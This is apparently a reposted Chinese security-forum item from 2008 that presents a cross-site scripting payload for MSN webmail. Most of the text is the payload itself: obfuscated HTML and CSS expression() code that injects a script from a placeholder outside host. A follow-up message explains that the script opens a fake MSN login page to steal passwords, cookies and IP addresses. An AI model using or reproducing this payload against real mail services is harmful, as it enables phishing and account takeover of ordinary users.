Msn最新跨站代码
来源:岁月联盟
时间:2008-08-04
ps:用web收msn邮件时候小心点了。
monkeycz to ph4nt0m: <font color="ffffff"> <div id="jmp" style="display:none">nop</div><div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div><div id="tip" title="<a style="display:none">" style="display:none"></div><div id="tap" title="<" style="display:none"></div><div id="tep" title=">" style="display:none"></div><style>div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=http://xxx.com/test/index.asp?uid=someone@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style></font>
coolman to ph4nt0m: 此跨站可以在目标客户看邮件的时候打开一个伪造的msn登录页面,要求客户重新输入密码,获取密码,cookies,来源ip,等信息
至于跨站里那个index.asp就是伪造的假登录页面
下一篇:苹果漠视DNS安全漏洞 自陷危机
